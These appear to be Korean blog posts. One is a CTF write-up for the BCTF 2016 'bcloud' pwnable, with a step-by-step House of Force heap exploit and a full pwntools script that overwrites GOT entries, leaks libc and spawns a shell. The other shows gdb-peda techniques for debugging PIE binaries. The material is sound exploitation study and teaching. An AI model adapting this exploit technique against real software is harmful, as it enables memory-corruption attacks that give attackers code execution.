[BCTF 2016] bcloud
tistory 블로그에 writeup쓰는 것이 너무 귀찮아지고 잇다...
언젠가 github 블로그로 옮겨야지 ㅁㄴㅇㄹ
bcloud를 풀어보았다. 최근 마크다운으로 롸업을 쓰다보니 티스토리를 못써먹겟지만... 깃헙 블로그 만드는게 귀찮으니 그냥 써야겟다....
익스는 아래와 같이 진행하였다.
취약점 : House of force
1. name입력에서 0x40만큼 꽉 채워입력하여 heap_addr를 leak
2. house of force를 이용하여 free_got영역에서부터 다음영역을 할당받을 수 있게 한다.
3. exit_got를 main으로 바꾸고, 나머지 got영역은 원래 함수의 plt+6지점으로 덮는다.
4. setvbuf함수도 puts_plt+6으로 덮는다.
5. 일부러 exit
6. main함수로 돌아와 puts(stdin), puts(stdout), puts(stderr)가 출력되어 leak이 가능하다.
7. leak한 값을 토대로 system함수 주소를 구한다.
8. atoi함수를 system함수로 덮어서 쉘을 획득.
다해놓고보니 그냥 사실 bss영역에 할당되는 heap 노트영역? 노트엿나 뭐였나 어쨋든 그부분을 덮어서 edit해도 되는 것이였다...
나는 edit이 없는줄 알았는데 있더라;;
아무튼 이렇게도 풀수있더라~
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 | from pwn import * conn = process("./bcloud") conn.sendafter("name:", "A"*0x40) conn.recvuntil("A"*0x40) heap_addr = u32(conn.recv(4)) log.info("heap : " + hex(heap_addr)) conn.sendafter("Org:", "B"*0x40) conn.sendlineafter("Host:", p64(0xFFFFFFFF)) def new(size, content): conn.sendlineafter("option--->>", "1") conn.sendlineafter(":", str(size)) conn.sendlineafter("content:", content) def edit(idx, content): conn.sendlineafter("option--->>", "3") conn.sendlineafter("id:", str(idx)) conn.sendlineafter("content:", content) def rm(idx): conn.sendlineafter("option--->>", "4") conn.sendlineafter("id:", str(idx)) read_got = 0x804b00c top = heap_addr + 0xd0 force = read_got - top - 0x8 log.info("force : " + str(force)) # force conn.sendlineafter("option--->>", "1") conn.sendlineafter(":", str(force)) main_addr = 0x8048C81 puts_plt = 0x8048520 payload = "A"*4 # __stack_chk_fail payload += p32(0x8048506) # strcpy -> strcpy_plt+6 payload += p32(0x8048516) # malloc -> malloc_plt+6 payload += p32(puts_plt+6) # puts payload += "A"*4 payload += p32(main_addr) # exit payload += "A"*4 payload += p32(puts_plt) # set payload += p32(0x8048576) # memset_plt+6 payload += p32(0x8048586) # atoi_plt+6 new(0x200, payload) #context.log_level = "debug" conn.sendlineafter("option--->>", "6") conn.recvuntil("Bye!\n\n") conn.recv(4) stdin_addr = u32(conn.recv(4)) - 71 base_addr = stdin_addr - 0x1b25a0 log.info("stdin_addr : " + hex(stdin_addr)) log.info("base_addr : " + hex(base_addr)) system_addr = base_addr + 0x3ada0 conn.sendlineafter("name:", "A") conn.sendlineafter("Org:", "B") conn.sendlineafter("Host:", "C") payload = "A"*4 payload += p32(0x8048506) payload += p32(0x8048516) payload += p32(puts_plt+6) payload += "A"*4 payload += p32(main_addr) payload += "A"*4 payload += p32(puts_plt) payload += p32(0x8048576) payload += p32(system_addr) edit(1, payload) conn.sendlineafter("option--->>", "/bin/sh") conn.interactive() | cs |
'Write-up > Pwnable' 카테고리의 다른 글
[hack.lu CTF 2014] OREO (0) | 2019.07.27 |
---|---|
[0CTF 2016] zerostorage (0) | 2019.07.26 |
[CODEGATE 2015] yocto (RTDL) (0) | 2019.07.13 |
[PlaidCTF 2015] plaiddb writeup (0) | 2019.07.11 |
[DEFCON 2019 Quals] speedrun (0) | 2019.05.14 |
[ 19.04 ] glibc 2.29 heap exploit 관련
[Linux] gdb로 PIE 디버깅
P
PIE의 경우 gdb-peda로 디버깅할시 base주소가 항상 0x0000555555554000이더라...
그래서 그냥 저기에 함수 오프셋을 더해줘서 breakpoint를 걸어주면 된다.
단 한번은 직접 실행해줘야한다.
뭐 그것말고도 방법이 있더라...
아래 방법인데 나는 자주안쓰고, 위의 방법을 사용
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 | Reading symbols from datastore.elf...(no debugging symbols found)...done. gdb-peda$ b * 0 Breakpoint 1 at 0x0 gdb-peda$ r Starting program: /home/myria/study_pwn/plaiddb/datastore.elf Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x0 gdb-peda$ x/20i $pc => 0x7ffff7dd7c30: mov rdi,rsp 0x7ffff7dd7c33: call 0x7ffff7dd89b0 0x7ffff7dd7c38: mov r12,rax 0x7ffff7dd7c3b: mov eax,DWORD PTR [rip+0x225037] # 0x7ffff7ffcc78 0x7ffff7dd7c41: pop rdx 0x7ffff7dd7c42: lea rsp,[rsp+rax*8] 0x7ffff7dd7c46: sub edx,eax 0x7ffff7dd7c48: push rdx 0x7ffff7dd7c49: mov rsi,rdx 0x7ffff7dd7c4c: mov r13,rsp 0x7ffff7dd7c4f: and rsp,0xfffffffffffffff0 0x7ffff7dd7c53: mov rdi,QWORD PTR [rip+0x2253e6] # 0x7ffff7ffd040 0x7ffff7dd7c5a: lea rcx,[r13+rdx*8+0x10] 0x7ffff7dd7c5f: lea rdx,[r13+0x8] 0x7ffff7dd7c63: xor ebp,ebp 0x7ffff7dd7c65: call 0x7ffff7de7750 0x7ffff7dd7c6a: lea rdx,[rip+0xfe4f] # 0x7ffff7de7ac0 0x7ffff7dd7c71: mov rsp,r13 0x7ffff7dd7c74: jmp r12 0x7ffff7dd7c77: nop WORD PTR [rax+rax*1+0x0] gdb-peda$ b *0x7ffff7dd7c6a Breakpoint 2 at 0x7ffff7dd7c6a Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x0 gdb-peda$ d 1 gdb-peda$ r Starting program: /home/myria/study_pwn/plaiddb/datastore.elf [----------------------------------registers-----------------------------------] RAX: 0x1c RBX: 0x0 RCX: 0x7fffffffe5b8 --> 0x7fffffffe7f6 ("XDG_SESSION_ID=5") RDX: 0x7fffffffe5a8 --> 0x7fffffffe7ca ("/home/myria/study_pwn/plaiddb/datastore.elf") RSI: 0x1 RDI: 0x7ffff7ffe168 --> 0x555555554000 --> 0x10102464c457f RBP: 0x0 RSP: 0x7fffffffe5a0 --> 0x1 RIP: 0x7ffff7dd7c6a (<_dl_start_user+50>: lea rdx,[rip+0xfe4f] # 0x7ffff7de7ac0 <_dl_fini>) R8 : 0x7ffff7ffe6f8 --> 0x0 R9 : 0x0 R10: 0x8e R11: 0x7ffff7b95300 --> 0xfff229defff228ec R12: 0x555555554bc7 (xor ebp,ebp) R13: 0x7fffffffe5a0 --> 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7dd7c5f <_dl_start_user+39>: lea rdx,[r13+0x8] 0x7ffff7dd7c63 <_dl_start_user+43>: xor ebp,ebp 0x7ffff7dd7c65 <_dl_start_user+45>: call 0x7ffff7de7750 <_dl_init> => 0x7ffff7dd7c6a <_dl_start_user+50>: lea rdx,[rip+0xfe4f] # 0x7ffff7de7ac0 <_dl_fini> 0x7ffff7dd7c71 <_dl_start_user+57>: mov rsp,r13 0x7ffff7dd7c74 <_dl_start_user+60>: jmp r12 0x7ffff7dd7c77 <_dl_start_user+63>: nop WORD PTR [rax+rax*1+0x0] 0x7ffff7dd7c80 <_dl_initial_error_catch_tsd>: lea rax,[rip+0x226339] # 0x7ffff7ffdfc0 <data> [------------------------------------stack-------------------------------------] 0000| 0x7fffffffe5a0 --> 0x1 0008| 0x7fffffffe5a8 --> 0x7fffffffe7ca ("/home/myria/study_pwn/plaiddb/datastore.elf") 0016| 0x7fffffffe5b0 --> 0x0 0024| 0x7fffffffe5b8 --> 0x7fffffffe7f6 ("XDG_SESSION_ID=5") 0032| 0x7fffffffe5c0 --> 0x7fffffffe807 ("SHELL=/bin/bash") 0040| 0x7fffffffe5c8 --> 0x7fffffffe817 ("TERM=xterm") 0048| 0x7fffffffe5d0 --> 0x7fffffffe822 ("SSH_CLIENT=192.168.233.1 49767 22") 0056| 0x7fffffffe5d8 --> 0x7fffffffe844 ("SSH_TTY=/dev/pts/1") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x00007ffff7dd7c6a in _dl_start_user () from /lib64/ld-linux-x86-64.so.2 gdb-peda$ x/10i $r12 0x555555554bc7: xor ebp,ebp 0x555555554bc9: mov r9,rdx 0x555555554bcc: pop rsi 0x555555554bcd: mov rdx,rsp 0x555555554bd0: and rsp,0xfffffffffffffff0 0x555555554bd4: push rax 0x555555554bd5: push rsp 0x555555554bd6: lea r8,[rip+0xfc3] # 0x555555555ba0 0x555555554bdd: lea rcx,[rip+0xf4c] # 0x555555555b30 0x555555554be4: lea rdi,[rip+0xffffffffffffff35] # 0x555555554b20 gdb-peda$ p 0x555555554b20 $1 = 0x555555554b20 gdb-peda$ | cs |
'Pwnable!!' 카테고리의 다른 글
_dl_fini exploit (_rtld_global) (0) | 2019.10.09 |
---|---|
[ 19.04 ] glibc 2.29 heap exploit 관련 (0) | 2019.07.22 |
[glibc] malloc - fastbin size check 분석 : malloc(): memory corruption (fast) (0) | 2019.07.13 |
[x86 & x64] Return to dl resolve (rtdl) (0) | 2019.07.13 |
[18.04]glibc 2.27 이상에서 unsorted bin으로 main_areana leak 하는 법 (0) | 2019.07.08 |